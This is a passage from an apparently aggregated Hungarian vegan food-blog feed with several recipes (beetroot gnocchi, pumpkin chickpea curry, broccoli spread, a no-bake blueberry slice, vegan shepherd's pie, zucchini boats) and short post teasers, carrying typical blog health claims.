sodorjunk belőlük kb. 1 cm átmérőjű rudakat, hengereket. Bátran lisztezzük a deszkát, és a kezünket is, ha ragadna a tészta. Vágjunk kb. 1 cm-es darabkákat az 1 cm átmérjű rudakból, majd egy villával finoman csíkozzuk be a tetejét (lisztezzük a villát, hogy ne ragadjon rá a tészta). Ettől kicsit szétlapul, így lesz henger formájú, és nem négyzet. (Négyzet alakúan, csíkok nélkül is népszerű és finom, ha nincs kedvünk formázgatni. ;-) ) Tegyünk fel egy edényben enyhén sós vizet forrni. Miután forr a víz, dobjuk bele óvatosan a nyers gnocchikat. Az összes tészta kb. egynegyedét egyszerre. (Enyhén lisztesen dobjuk bele, és akkor biztosan nem ragadnak össze.) Miután feljöttek a víz tetejére (kb. 2 perc), azonnal kiszedjük őket szűrőlapáttal egy tálba. Ne hagyjuk ázni feleslegesen! Eljátszuk ezt az összessel, tehát négyszer, amíg el nem fogy a nyers tészta. Ha úgy látjuk, hogy nem lesz szükségünk az összes tésztára, akkor még nyersen fagyasszuk le a felesleget. A következő 1-2 hónapban bármikor elővehetjük őket, és kivéve a fagyasztóból tegyük bele a forrásban lévő vízbe. Fagyasztott állapotában azonban több idő kell neki, így akár 5 - 7 percig is tarthat, míg feljönnek a víz tetejére. Úgy is lefagyaszthatjuk a felesleget, hogy kifőzzük a tésztát, hagyjuk kihűlni, enyhén lisztezzük, hogy ne ragadjanak össze, majd tegyük őket a fagyasztóba. Ezesetben csak pár hétig érdemes felhasználni, és fogyasztás előtt, kb. 5 perc alatt fel lehet melegíteni egy olajos serpenyőben, vagy 10 perc alatt a sütőben. Nem kell újra kifőzni! ;-) Fogyasszuk a gnocchikat, tetszés szerinti szósszal, sajtokkal, zöldségekkel, akár serpenyőben lepirítva is. Ezúttal egy diós gorgonzolás szószt készítettem hozzá, mert az ízes sajt - dió - cékla trió mindig levesz a lábamról. :-) A főzőtejszínbe daraboljuk a gorgonzola sajtot, hozzáadjuk a sót, borsot, fokhagymát, petrezselymet, a beáztatott dió felét ledarálva, a citrom levét, és az egészet folytonos kevergetés mellett besűrítjük. Céklás gnocchival tálaljuk a szószt, megszórjuk a maradék széttördelt dióval és friss parmezánt szórunk rá. (A diót azért áztatjuk be előre min. 24 órára, hogy az enzimgátlók kioldódjanak, és egészségesebb, egyszerűbben emészthető diót kapjunk.) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) Színélményben, ízélményben és tápanyagban gazdag jó étvágyat kívánunk! :-) Megjegyzés: Egy kis érdekesség...."Rómában a gn occhi egy tradicionálisan csütörtökön fogyasztandó étel, amelyet a következő mondás is tükröz: ha csütörtök akkor gnocchi, ha péntek akkor hal, ha szombat akkor pacal.("Gioved? gnocchi, Venerdi pesce, Sabato Trippa") Veronában egy nagy tányér paradicsomos gnocchit esznek meg hagyományosan a " Ven?rdi Gnocol?r napján, ami a karneváli kocsik felvonulásának napja. Végül de nem utolsó sorban a veronai álarcosbál hercegének is mi más lehetne a neve, mint Gombóc Apó azaz Pap? del Gnoco." Forrás: Íz és Itália Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes)
Testépítés növényi étrenden – interjú Sulyok Csillaggal
2015. szeptember 17. VegaNinja
A testépítés klasszikusan az a sport, amit állati fehérje nélkül teljességgel elképzelhetetlennek tartanak. Sulyok Csillag, a gyönyörű magyar vegán hölgy az ellenkezőjét fogja bizonyítani rövidesen bikinimodellként Rómában, egy nemzetközi versenyen. Mióta vagy vegán, és miért? Közel három éve lettem etikai vegán, vagyis az állatok kihasználásával van gondom. Korábban vegetáriánusként éltem, ám 2012-ben berobbant az életembe […]
Sütőtök curry csicseriborsóval
2015. szeptember 7. Vegán muflon
Ha valaki megkérdezné, hogy a blog története során miért nem közöltem olyan receptet, amihez a sütőtök nélkülözhetetlen alapanyag, válasz helyett vajúdó anyacickányt imitálnék. Ezzel a művelettel talán el tudnám terelni a figyelmét arról, hogy kérdésére nem tudok megfelelően frappáns magyarázatot adni. Pedig a tök olyannyira hálás komponens, hogy kis híján nevet adtam neki (mondjuk Zsebálkovits Jenő), és barátommá fogadtam. De aztán rájöttem, hogy az a barátság, amikor egyik fél széthasítja a másikat és kikanalazza annak velejét, hagy némi kívánnivalót maga után. Így aztán csak rideg távolságtartással Honbolygó Rezsőné postai alkalmazottként emlegettem a művelet közben, amit most megosztok az olvasókkal is. Alkotóelemek: 1 db közepes sütőtök 3-4 evőkanál olívaolaj 2 kiskanál római kömény 2 kiskanál őrölt koriander 1 kiskanál összetört chili 2 kiskanál madras (jobb híján hagyományos) currypor só, bors 1 nagy fej lilahagyma 5 db paradicsom 2-3 cm-es gyömbérgyökér (jobb híján 1 kiskanál gyömbérpor) 1 db zöld hegyes erőspaprika 2 gerezd fokhagyma 1 csokor koriander (elhagyható) 1 (konzerv)doboz csicseriborsó 2 marék spenótlevél 150 gramm basmati rizs 1 kiskanál kurkuma (hanyagolható) Akciórész: A sütőtököt - a drámai hatás kedvéért - velőt rázó sikoly közben kettévágjuk, magjait kikanalazzuk, majd felkockázzuk. Egy ún. tepsibe helyezzük, majd igazságosan elegyengetve meglocsoljuk olívaolajjal, megszórjuk római köménnyel, korianderrel, chilivel és madras curryvel. Sózzuk, borsozzuk, majd 40 percre agresszíven bevágjuk a 190 fokra melegített sütőbe. Az így keletkezett holtidőben nem jódlizunk bőrnadrágban, hanem kihasználjuk azt hasznosan: felrakjuk a rizst főni némi só társaságában. Továbbá felcsíkozzuk a hagymát, felaprítjuk a gyömbért, a fokhagymát, a hegyes erőspaprikát és a koriandert, majd felhevített olívaolajra helyezzük őket. Alacsony fokozaton 5-6 percig pároljuk, majd hozzáadjuk a felkockázott paradicsomot és a csicseriborsót. Sózzuk, borsozzuk, majd 20 percig hagyjuk az elegyet békében nyugodni. Ezt követően adjuk hozzá a spenótlevelet, amit elég 2-3 percig főzni. Mindeközben a tök is jó eséllyel elkészül, így egy megfelelően ízléstelen tepsifogó kesztyűvel kivesszük a sütőből. (Ez nem lesz nehéz, tudniillik ebből még ember nem gyártott ízléses darabot.) Ha adunk a látványelemekre is, a kész rizshez hozzáadjuk a kurkumát, és tálaljuk sütőtökkel és a paradicsomos-spenótos esszenciával.
Pikk-pakk kész, Brokkolikrém az uzsonnás dobozba (gluténmentes, laktózmentes, tojásmentes, nyers, vegán)
2015. szeptember 3. Zöld Avocado
lilahagymás Brokkolikrém, avokádóval krémesítve (mindenmentes, nyers, vegán) Elkezdődött az iskola és nem csak a gyerekeknek, de azoknak a felnőtteknek is, akik újra tanulásra adják a fejüket. Az egész élet egy folytonos tanulás... önfejlesztés, képzés, tudáselsajátítás, képesség és tehetségfejlesztés, amit néha az élet nevű iskolában, néha pedig valódi iskolai padokat koptatva sajátítunk el. Legyen szó saját magunkról, vagy a gyermekeinkről, a "sulis" időszakban, ilyenkor sokkal több időt töltünk távol az otthonunktól, mint amikor nincs iskola. Gyakrabban készítünk szendvicseket a reggeli rohanásban, és tömjük magunkba a rövid szünetek alatt a kissé száraz, ízetlen és unalmas szénhidrát pótló, üres kalóriákat. Egy átlagos szendvics általában két szelet kenyérből, egy kevés vajból, egy vékonyka sajtból, és egy szelet felvágottból áll, amitől elvárjuk, hogy erős fűszereivel, megízesítse az amúgy is unalmas szendvicsünket. Amikor végre elérkezik a kaja szünet, éhségtől vezérelt ösztöneinknek hála, feltépjük az iskolatáskánkat, izgatottan kicsomagoljuk, a reggel sebtiben elkészített szendvicsünket, kíváncsian szétnyitjuk, bízva benne, hogy valami nagyon finomat fogunk ma enni... majd csalódott arccal konstatáljuk, hogy a mai nap is olyan, mint a többi! :-( Az idő halad, a pocak korog, így hát enni kell, nincs mese. Talán majd holnap finomabb lesz! ;-) Emlékeztek ezekre a pillanatokra? Veletek is megtörtént már? És vajon a most iskolás gyermekeitek is átélik ezeket a perceket nap, mint nap? Elég figyelmet fordítunk a szendvicseinkre?... Vagy a nagy rohanásban el is felejtjük, hogy mennyivel jobb élményt varázsolhatunk az iskolapadba, ha egy laza kézmozdulattal egy kis, lédús zöldséget, ropogós salátalevelet, mellé pár szem paradicsomot is csomagolunk az unalmas szalámis-sajtos szendvicsek mellé?! Az egészségtudatos táplálkozás manapság aranykorát éli. Hihetetlen sebességgel veszik át a zöldségek, gyümölcsök, organikus és bio termékek, gluténmentes és laktózmentes ételek a helyeketet a szupermarketek polcain. Nem telhet el úgy egy nap, hogy ne találkoznánk az "egészséges életmód" témakörével. Az utcán szembeköszönnek a reklám táblák, a TV és a rádió is gyakran ontja magából a wellness, bio, öko tudatosság szavakat, és lassan minden ismerősünk életmódot váltott ilyen-olyan formában. Ez a nagy gasztro reform a szendvics piacot sem kerülheti el. bazsalikomos Brokkolikrém, avokádóval krémesítve (mindenmentes, nyers, vegán) A régi, megszokott, de unalmas sajtos - szalámis szendvics helyét átveszik a különböző színes és ízes, zöldségkrémek, zöldségpástétomok. Ennek természetesen én is örülök! :-) A saját szánk ízére formált zöldségkrémek, nem csak, hogy minden nap, más és más ízzel és színes, gusztusos látvánnyal láthatnak el minket, de még rengeteg vitaminhoz és ásványi anyaghoz, antioxidánsokhoz, nyomelemekhez, tápanyagokhoz, energiához, frissességhez, egyszóval mindenféle földi jóhoz juttathatják a szervezetünket. Nem csak a szemünk boldog, mikor abban a rövidke kis iskolai szünetben kinyitjuk a "madárlátta" szendvicsünket, de a nyáltermelésünk is egyből beindul az illatok és színek láttánk. Örömmel faljuk a padlizsánkrémes, zöldborsókrémes, magyaros szezámmagkrémes (tahini) szendvicseinket, jól megpakolva friss és ropogós zöldségekkel. Jóllakottan, és energiától duzzadva fordulunk vissza a padba a csengőszó után, és lelkesen vetjük bele magunkat a tanulásba, az ismeretanyagok elsajátításába. bazsalikomos Brokkolikrém Az Internet telis tele van jobbnál jobb házi készítésű zöldségkrémekkel, pástétomokkal, kenyér kencékkel. A legtöbb recept 10-15 perc alatt elkészíthető még előző este, és a következő 2-3 napban reggelente, a hűtőből kivéve gyorsan a szendvicsekre kenhetjük őket. brokkolikrém (mindenmentes, nyers, vegán)A szezont követve, én most egy pikk-pakk kész, tápanyagban gazdag, immunerősítő, méregtelenítő, lugosító, brokkolikrémet hoztam nektek. Tudom, tudom. A brokkoli egyáltalán nem egy népszerű zöldség a magyarak körében. Nálam sem volt az, amíg csak önmagában, fűszerek nélkül, szétfőzve próbáltam meg a tányéromról elpusztítani. A brokkoli olyan, mint az avokádó. Önmagában kevés embernek ízlik, de a megfelől ételekben alapanyagként, a megfelelő fűszerekkel társítva nagyon finom és egészséges ételeket lehet készíteni belőle! Kóstoljátok meg a Zöld Avocado brokkolikrémlevesét, vagy brokkolis sajtos krumpliját, de a vállalkozóbb kedvűek kipróbálhatják a máltai Qassatat-ot, hagymás-brokkolis töltelékkel. Akkor lássuk, hogyan készül ebből a zöld, egészségvédő lovagból, gyors, egyszerű és finom kence a kenyerünkre?! ;-) bazsalikomos Brokkolikrém, avokádóval krémesítve (mindenmentes, nyers, vegán) HOZZÁVALÓK:párolt brokkoliból: - 1 kisebb fej (szép zöld) brokkoli - 1 ek extra szűz olíva olaj - 2 gerezd fokhagyma - 1/2 fej lila hagyma - Himalája só, frissen őrölt fekete bors, 1 tk mustár - 1/2 frissen facsart citrom leve - 1/2 érett avokádó, hogy krémesebb legyen a brokkoli krém (elhagyható) nyers brokkolikrémhez: - u.az, mint a párolthoz (mustár nélkül) - és 1/2 bögre mandula (előre beáztatva egy éjszakára) elhagyható, de érdemes felhasználni: - 1 ek sörélesztőpehely, amitől finom, extra sajtos ízt kap (elhagyható) - 2-3 bazsalikom levél, mert nagyon jól illik a zöld ízvilágba (elhagyható) - 1 ek őrölt lenmag, a tápanyagértékét növeli, segíti az emésztést (elhagyható) - 1 ek útifűmaghéj, ha túl leveses lenne a krém. Ettől szilárdabb, sűrűbb lesz. (elhagyható) lilahagymás Brokkolikrém, avokádóval krémesítve (mindenmentes, nyers, vegán) ELKÉSZÍTÉS: Készíthetjük nyers és párolt brokkoliból is (nyersen vitamindúsabb, lásd. Megjegyzés rovatban alul). Mindkét esetben a brokkolit rózsáira szedve alaposan megmossuk. A lila hagymát, a fokhagymával, a mustárral, tetszőleges mennyiségű sóval, borssal, (a bazsalikommal), a citrom levével és 1 ek extra szűz olíva olajjal alaposan leturmixoljuk. Ha a nyers brokkolikrémet választottuk, az apróra szedett brokkoli rózsákat (fás szár nélkül), kb. 0,5 dl mandula tejjel (vagy tiszta vízzel) a zöldségaprítóba tesszük, és addig hagyjuk a gépet dolgozni, míg teljesen apró zöld morzsákat nem kapunk. Hozzáadjuk az előre beáztatott mandulát (áztató víz nélkül), az avokádót, és a hagymás fűszeres olajat. Majd addig turmixoljuk, míg krémes állagot nem kapunk. Ha párolt brokkolival készítjük a krémet, akkor a párolt brokkoli rózsákat, a hagymás fűszeres olajat, a nyers avokádóval, addig turmixoljuk, míg egynemű krémet nem kapunk. Légmentesen zárható edénybe téve, hűtőbe velük, és másnap reggel (vagy azonnal) már fogyaszthatjuk is az energia- és tápanyagdús szendvicskrémünket! ;-) mungóbabcsíra Ha mégtöbbet szeretnénk tenni az egészségünkért, cseréljük le az üres tápértékkel bíró, fehér kenyerünket, teljeskiőrlésű kenyérre, vagy tömör barna, rozs kenyérre. Egyre többen vannak, akik pedig egyáltalán nem fogyasztanak élesztős, kelt kenyereket. Helyette, házilag is elkészíthető magos krékerekre, vagy bolti extrudált kenyerekre kenhetjük a különböző zöldégpástétomjainkat. Változtassuk a szendvicsekben a zöldségeket és a különböző természetes táplálékkiegészítőket is. Ha egyik nap sörélesztőpehellyel hintettük meg a zöldségkrémet, akkor másnap használjunk kendermagot, vagy különböző csírákat. bazsalikomos Brokkolikrém, avokádóval krémesítve (mindenmentes, nyers, vegán) Tápláló, vitaminokban és energiában gazdag, iskolai szendvicsezést kívánunk! :-) Megjegyzés1: A brokkoli gazdag vitaminokban, ásványi anyagokban, antioxidánsokban, értékes vegyületekben és fontos növényi rostokban. Kutatások azt is kimutatták, mennyire jótékony hatású többféle rákbetegség, továbbá az áttétképződés megelőzésében. Azonban ezek az értékes tápanyagok csak a nyers, vagy enyhén párolt (lehetőleg kuktában) brokkoliban találhatóak meg. Így ha azt hisszük, hogy jót teszünk magunkkal, ha agyonfőzve letuszkoljuk őket a torkunkon, mert egészséges, akkor "sok hűhó semmiért", mert az értékes tápanyagokat a főzővízzel együtt kiborítottuk a csapba. A mediterrán országokban ezért gyakran fogyasztják nyersen rózsáira szedve, vagy apróra zúzva a brokkolit. Az északi országokban pedig szinte nélkülözhetetlen szereplői a párolt brokkoli rózsák a vacsora tányéroknak. Mi magyarok még csak pár évtizede ismerkedünk ezzel a kiváló zöldséggel, de a Világ már több száz éve ismeri, és szereti. Megjegyzés2: "A brokkoli 100 gr-ja mintegy 89 mg C-vitamint tartalmaz, ami az átlag 2000 Kcal-ás étrend mellett javasolt C-vitaminszükséglet 107%-a! A vitaminok közül nagy mennyiséggel büszkélkedhet K-vitaminból (101 ?g - ez kis híján a napi szükséglet 100%-a), A-, többféle B- (köztük a folsavként ismert B9-vitaminból) és E-vitaminokból. Magnézium, kalcium, cink és vas - ez utóbbi legnagyobb mennyiségben a levelekben - egyaránt gazdagítja ezt a kitűnő zöldségfélét." Forrás: mindmegette.hu bazsalikomos Brokkolikrém, avokádóval krémesítve (mindenmentes, nyers, vegán)
Tápanyagban gazdag, sütésmentes, csíkos szelet (gluténmentes, laktózmentes, tojásmentes, nyers, vegán)
2015. augusztus 28. Zöld Avocado
Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) Lassan vége a nyárnak, kezdődik az iskola, letellik a szabadság, elindul a mókuskerék. Nem panaszkodhatunk, mert az idén bőven kijutott a napsütésből, a melegből, a strandon töltött órák számából, és még az országot sem kellett elhagynunk, hogy egy mediterrán éghajlatú tengerparton érezzük magunkat. Elég volt leruccani a Balatonra, kikérni egy koktélt, és élvezni a magyar tenger látványát, a semmittevést, a pihenést, természetesen az árnyékból. ;-) Nem meglepő, hogy keveset álltunk a tűzhely mellett, és igyekeztünk inkább gyorsan elkészíthető, lédús ételeket, édességeket fogyasztani, még az esti kerti partik alkalmával is. Úgy érzem akkor lesz igazán szép ez a történet, ha az utolsó forró nyári hétvégét is, egy sütésmentes, gyorsan elkészíthető, hűsítő, ízletes, és tápanyagban gazdag édességgel zárom a Zöld Avocado gasztroblogon. :-) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) Egy hűtőre, egy turmix gépre, és egy kávédarálóra lesz szükségünk hozzá, és néhány természetes alapanyagra. Nem igényel sem sütést, sem főzést, sem tartósítószert, vagy plusz édesítést. Könnyen emészthető, gyomorbarát, enzimgazdag, ásványi anyagokban, vitaminokban bővelkedő, energiadús, tápláló, diétás nassolnivaló, amit étel allergiások is bátran fogyaszthatnak! :-) (Kivétel a diófélékre allergiások.) Bármilyen könnyen kocsonyásodó, kevésbé lédús gyümölccsel elkészíthetitek ezt a desszertet. Egy házi, cukor- és tartósítószermentes lekvárt kutyulunk a választott gyümölcsből az édesség tetejére. Nálam ez megint a fekete áfonya volt. Nagyon szeretjük, és lassan vége az idei évi fekete áfonya szezonnak, így még utoljára ő lett a befutó ennél a receptnél is. Remélem nem bánjátok, és a korábbi áfonyás szelet, áfonyás chia puding reggeli, és banán palacsinta után, még ezt a csíkos szeletet is szívesen megkóstoljátok házi fekete áfonya lekvárral a tetején. De ha mégsem, akkor készítsétek el pl.: lila szőlővel, eperrel, egressel, sárgabarackkal, szederrel stb. Bármivel, ami könnyen "lekvárosodik". Ha túl sok leve van, azt csepegtessétek le és igyátok meg külön. ;-) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) És hogy miért is fogyasszunk rendszeresen fekete áfonyát? "Az áfonya többek között Észak-Amerikában őshonos növény, és régóta elismert és fontos része az amerikai indiánok étrendjének. Az indiánok jöttek rá annak idején, hogyha e bogyós gyümölccsel dörzsölik be a szárított húsokat, akkor lassíthatják azok romlását. A közelmúltban a Journal of Clinical Nutrition folyóiratban közzétett, nemrégiben készült tanulmány megállapította, hogy azon személyeknél, akik napi 15 dkg áfonyát fogyasztottak rendszeresen, a vérben lévő ANTIOXIDÁNSOK MENNYISÉGE JELENTŐSEN EMELKEDETT, és a kutatók szerint ez elengedhetetlen a különböző szív- és érrendszeri megbetegedések , a cukorbetegség, az öregedés, a rák, a makula degeneráció és a szürkehályog kialakulásának megelőzéséhez. - a vérben lévő antioxidánsok fokozott jelenléte csökkenti a mellrák kialakulásának kockázatát - az áfonya képes csökkenteni és megelőzni az öregkori betegségek (mint például az Alzheimer-kór és az elbutulás) hatásait - az antioxidánsok védenek a sejtszerkezetet és a DNS-t károsító szabad gyökökkel szemben, melyek számos degeneratív betegség okozói - az áfonya segít megőrizni az egészséges bőrt, és csökkenti a kor előrehaladtával kialakuló bőrhibákat - emésztésre gyakorolt pozitív hatása: az áfonya pektinben gazdag rostja enyhíti a hasmenés és a székrekedés tüneteit. Emellett, a gyümölcsben lévő tanninok csökkentik az emésztőrendszer gyulladását, míg a polifenolok bizonyítottan antibakteriális tulajdonságokkal rendelkeznek. - az áfonya antioxidáns védelme a szervezet vércukor szabályozó rendszerére is kedvező hatással van - rendszeres fogyasztása kimutathatóan javítja a vérzsírok egyensúlyát, vagyis csökkenti a teljes koleszterin szintjét, segít fenntartani az egészséges vérnyomás értékét - kedvező hatást gyakorol a vércukorszint optimális szabályozására - segítik a retinasejtek gyors regenerálódását " Forrás: Dietless.hu Most, hogy már látjátok, hogy miért is fogyasztunk gyakran fekete áfonyát, nézzük, hogyan készítjük el ezt a rendkívül egyszerű, sütés- és főzés tudományt nem igénylő édességet?! Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) HOZZÁVALÓK: áfonya lekvár réteghez: - 300 g friss fekete áfonya - 1 ek útifűmaghéj / vagy chia mag (elengedhetetlen, mert ettől kocsonyásodik meg a "lekvár") fehér, kókusz réteghez: - 1,5 bögre kókuszreszelék - 4 ek tetszőlegesen választott édesítő szirup pl.: Agave szirup, rizs szirup, datolya szirup, vagy jó minőségű méz - 1/2 dl + 2 ek kókusztej - 2 ek kókusz olaj (kókuszzsír) - 1/2 bögre natúr kesudió (beáztatva vízbe előző éjjel) barna, csokis réteghez: - 1,5 bögre natúr kesudió és mandula keverék (áztassuk be előző éjjelre vízbe, hogy az emésztést nehezítő enzimgátlók kioldódjanak) - 4-5 szem mag nélküli aszalt datolya vagy aszalt füge vagy aszalt szilva (áztassuk be előző éjjelre vízbe) - 2 ek kókusz olaj (kókuszzsír) - 3 ek karobpor (jó minőségű kakaó port is használhatunk, de a karob egészségesebb) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) ELKÉSZÍTÉS: A házi cukor- és tartósítószermentes "lekvárhoz" a megmostott áfonyát turmixoljuk le, majd keverjünk hozzá útifűmaghéjat vagy chia magot, és tegyük az egészet a hűtőbe kb. fél órára. Kész is a házi áfonya "lekvár". A csíkos süti alsó rétegéhez, a barna "tésztához", az előre beáztatott kesut és mandulát (áztató víz nélkül) daráljuk le. A választott aszalt édes kötőanyagot (szilva, datolya, vagy füge) tegyük a dupla késes zöldség aprító / daráló részbe, és készístünk belőle pépet (áztató víz nélkül). A darált kesu és mandula keveréket, az aszalt datolya pépet, a kókusz olajat és a karob port kézzel gyúrjuk jó alaposan össze, míg egy nagy masszát nem kapunk. Ezt a "csokis" masszát aztán nyomkodjuk a választott sütemény formánk, vagy tálunk aljára. Ez lesz a sütemény alja. Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) A középső, fehér, kókuszos réteghez őröljünk porrá 1 bögre kókuszreszeléket, illetve külön daráljunk meg egy 1/2 bögre előre beáztatott kesudiót (áztató víz nélkül). A kókuszreszelék port, a darált kesudiót, 2 ek kókusztejjel turmixoljunk krémes állagúra. Adjuk hozzá a maradék 1/2 bögre kókuszreszeléket, a választott édesítő szirupot, 1/2 dl kókusztejet és 2 ek kókusz olajat, majd kézzel dolgozzuk össze az egész kókuszos tölteléket. Egyengessük a barna alsó rétegre. Kenjük a sütemény tetejére a házi áfonya "lekvárunkat", és ha van otthon dekorációnak szórjunk rá kókusz chipset a tetejére. Majd az egészet tegyük be a hűtőbe 3-4 órára, hogy jól vágható süteményt kapjunk. Ha nem fontos a szépség, akkor akár azonnal fogyaszthatjuk is az így elkészült gyors, egyszerű, mindenmentes, tápláló és nagyon finom édességünket! ;-) Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán) Ne felejtsd el: Táplálkozz, ne csak étkezz! :-) Megjegyzés: "Ha maximalizálni szeretnénk ezen gyümölcs antioxidáns hatását, akkor lehetőleg bioáfonyát vásároljunk! Egy közelmúltban készült tanulmány ugyanis közvetlenül hasonlította össze egy organikusan, illetve nem organikusan termesztett áfonyatípus (Vaccinium corymbosum L.) teljes antioxidáns hatását, és a kutatók látványos különbségeket találtak a bio előírásoknak megfelelően termesztett áfonya javára. Ez utóbbi ugyanis a hagyományos áfonyához képest jelentősen nagyobb koncentrációban tartalmazott fenol és antocián antioxidánsokat, és a teljes antioxidáns kapacitása is lényegesen nagyobb volt." Forrás: Dietless.hu Áfonyás - kókuszos - csokis csíkos szelet (mindenmentes, nyers, vegán)
A legfenségesebb pásztor pite – Sheperd’s pie – (vegán)
2015. augusztus 24. Zizi kalandjai
Réges régen látogatóban járt nálunk két angol barátunk, Jay és Jon. Jay-t ismertük, ő hozta magával Jon-t, aki “katasztrófára” számított Magyarországot illetően. Aztán persze nagyon nagyot csalódtak, amikor kiderült, hogy milyen szép az országunk, milyen csodás vendéglátásban van részük és milyen fantasztikus, jófej barátaink vannak. Ki akarták fejezni hálájukat a vendéglátásért, ezért úgy döntöttek, hogy főznek nekünk valami nagyon angolosat. Jon fel is hívta az anyukáját, hogy pontos instrukciókat kapjon egy recept elkészítését illetően, ami nem volt más, mint a Sheperd’s pie (pásztor pitének lehetne fordítani…). Megvettük együtt az alapanyagokat, majd birtokba vették a konyhát, ahonnan mi teljes mértékben ki lettünk tiltva és két angol pasi, akik még életükben nem főztek semmit, készítettek nekünk egy finom vacsorát nyolc főre. Néha-néha azért bepillantottunk a konyhában, hogy mennyire van káosz, de a fiúk egész jól kezelték a helyzetet. Az akkor készült verzió húsos volt, de, amit én hoztam most, az egy vegán verzió. Annyira, de annyira jól sikerült, hogy az egyik húsevő nagypapa is megnyalta utána a tíz ujját. Egy kevés maradt belőle és másnap csak remélni tudtam, hogy se I. se Ádi nem kér belőle és az egészet én ehetem meg vacsorára. Így is történt. Azóta még egyszer elkészítettem és újfent nem tudtam betelni vele. Állandó étel lesz a családi “étlapunkon”, az már tuti! A bele kerülő zöldségek természetesen ízlés és hűtőtartalom szerint változtathatók: cukkini, padlizsán, gomba, csicseriborsó, bab, stb., amit találtok, azt tegyetek bele! Készítettem hozzá zöld köretet leveleskelből, de párolt fokhagymás spenóttal vagy mángolddal is isteni lehet! Vegán pásztor pite (Sheperd’s pie) Hozzávalók: – 10-12 db közepes méretű burgonya, meghámozva, felkockázva – 2 nagy fej vöröshagyma, felaprítva – 4-5 gerezd fokhagyma, felaprítva – 1 szál zeller vagy egy kis zellergumó fele, felaprítva – 1 db közepes répa, felaprítva – 1 db kisebb padlizsán, felkockázva – 2-3 db közepes cukkini (kb. 10-15 cm hosszúak), felkockázva – 1 db paprika, felkockázva – 250 g csiperke gomba, felszeletelve – 1 marék vöröslencse – 1 db konzerv csicseriborsó, leszűrve, átmosva – 350-450 ml paradicsomlé – 100-200 ml víz – zöldfűszerek: bazsalikom, oregánó, petrezselyem, felaprítva – 2 teáskanál füstölt pirospaprika – 1 evőkanál sörélesztő pehely – só, bors – kókuszzsír A burgonyából burgonyapürét kell készíteni. Megfőzzük sós vízben a felkockázott burgonyát, majd leszűrjük. Adjunk hozzá 2-3 evőkanál kókuszzsírt, törjük össze, pürésítsük és tegyük félre. Egy nagy serpenyőben kevés kókuszzsíron dinszteljük meg a vöröshagymát és fokhagymát a répával és zellerrel. Kb. 8 perc után adjuk hozzá a paprikát, a padlizsánt és a cukkinit. Főzzük közepes láng felett 8-10 percig, majd adjuk hozzá a gombát. Ekkor sózzuk, borsozzuk és szórjuk meg a füstölt paprikával. Pirítsuk, főzzük további 5 percig, majd öntsük hozzá a paradicsomlevet és a vizet. Először kevesebb mennyiséget a megadottnál, hogy a végén tudjuk hígítani a ragut, ha szükséges. Ekkor adjuk hozzá a zöldfűszereket is és újabb kóstolás után ízesítsük még sóval és borssal, ha szükséges. Főzzük addig, amíg a zöldségek éppen megpuhulnak (kb. 15 perc), alkalmanként megkeverve. Ezután adjuk hozzá a vöröslencsét és a leszűrt csicseriborsót és ha túl sűrűnek találjuk a ragut, lazítsuk egy kevés paradicsomlével és/vagy vízzel. Főzzük további 5-10 percig, majd zárjuk el alatta a gázt. A ragut kanalazzuk át egy mély tepsibe, egyengessük el a tetejét, majd szedjük rá a már elkészült burgonyapürét. Simítsuk el a tetejét, majd szórjuk meg a sörélesztő pehellyel és egy kevés füstölt paprikával. 180C fokra előmelegített sütőben süssük kb. 20-25 percig, amíg a teteje egy kicsit megpirul, a ragu pedig bugyogni kezd.
Vendégvárásra fel! - vörösbab pörkölt kuszkusszal cukkini hajókban tálalva, és paradicsomos kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán)
2015. augusztus 19. Zöld Avocado
vörösbab pörkölt kuszkusszal, cukkini hajókban tálalva (laktózmentes, tojásmentes, vegán) Egyszer volt hol nem volt, a messzi messzi galaxisban, az Óperenciás-tengeren túl, ahol a kurta farkú malac túr (és őt nem esszük meg ;-) ), egy igen kreatív konyhatündér nézegette, forgatgatta az ízetlen, és roppanós cukkinit, és azon gondolkodott, milyen ételt készíthetne belőle, mely ízletes és laktató?! Használta már korábban lereszelve, felcsíkozva, karikázva, spirál formára vágva, hosszú vékony szeletekben, sütve, főve, párolva, nyersen, de most valami újra vágyott! ;-) Vakargatta a fejét, nagyon koncentrált, és addig-addig nézegette ezeket a zöld tökféléket a tengerparton állva, miközben a tekintete hol a cukkinikre, hol a kikötőbe érkező hajókra esett, amíg egyszer csak felkiáltott! "Ez az! A hajók! Cukkini hajókat fogok készíteni!" :-) A cukkini formája tökéletesen biztosítja, hogy egyszerű mozdulatokkal hajó törzseket készítsünk belőlük, amiket aztán különböző ízesítésű töltelékekkel (rakománnyal) megtölthetünk, és nyersen vagy akár a sütőben egy kicsit megpuhítva, megpirítva jó ízűen elfogyaszthatunk! A tölteléktől függően lehet ez egy könnyed vacsora, vagy vendégfogadó falatkák, de akár egy kiadós főételt is készíthetünk belőlük! :-) olaszos ízvilágú, paradicsomos, kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán) A nyár egyik nagy slágere a cukkini. Sokan nem szeretik (korábban én sem), de csak azért, mert nem értik ezt az egyszerű, de mégis nagyszerű zöldséget. A cukkini önmagában történő rágcsálása, nem sok embernek okoz örömet, és élménydús étkezést. Bár magas víztartalmának, és semleges ízének köszönhetően tökéletes nassolni való nyersen is, a meleg nyári napokra, azért nem muszáj nekiesnünk csak úgy, önmagában. Készíthetünk a nyers cukkini csíkok mellé finom mártogatósokat (pl.: fűszeres magyaros mártogatós), vagy felhasználhatjuk a cukkinit hidegen-melegen krémlevesként, enyhén fűszereve. Rengeteg főétel alapanyaga is lehet ez a semleges ízű, zöld tökféle (példa receptek ebben a bejegyzésben), salátákban is növelhetjük vele a tápértéket, de még kevert sütemények textúráját is javíthatjuk vele. :-) Ha felismerjük az elsőre unalmasnak tűnő cukkiniben rejlő nagyszerű lehetőségeket, egy olyan konyhai 